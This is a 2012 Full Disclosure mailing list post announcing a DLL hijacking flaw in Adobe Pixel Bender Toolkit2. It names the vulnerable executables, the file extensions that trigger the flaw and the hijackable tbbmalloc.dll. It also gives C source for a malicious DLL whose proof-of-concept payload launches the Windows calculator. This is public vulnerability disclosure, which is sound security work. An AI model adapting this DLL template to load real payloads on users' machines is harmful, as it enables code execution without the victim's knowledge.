
Full Disclosure mailing list archives
Adobe Pixel Bender Toolkit2 (tbbmalloc.dll) DLL Hijacking Exploit
From: kaveh ghaemmaghami <kavehghaemmaghami () googlemail com>
Date: Thu, 23 Aug 2012 04:20:23 -0700
Exploit Title: Adobe Pixel Bender Toolkit2 (tbbmalloc.dll) DLL Hijacking Exploit Date: 2012-08-23 Author: coolkaveh coolkaveh () rocketmail com Greets To Mohammad Morteza Sanaie sanaie.morteza () gmail com Https://twitter.com/coolkaveh Vendor Homepage: http://www.adobe.com/ Version: 11.0.422584 Tested on: windows XP Sp3 ENG --------------------------------------------------------- # Vulnerable: Pixel Bender Toolkit.exe & sniffer_gpu.exe --------------------------------------------------------- # Vulnerable extensions: .pbk & .pbg --------------------------------------------------------- # Vulnerable Dll: tbbmalloc.dll --------------------------------------------------------- #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; } _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Adobe Pixel Bender Toolkit2 (tbbmalloc.dll) DLL Hijacking Exploit kaveh ghaemmaghami (Aug 23)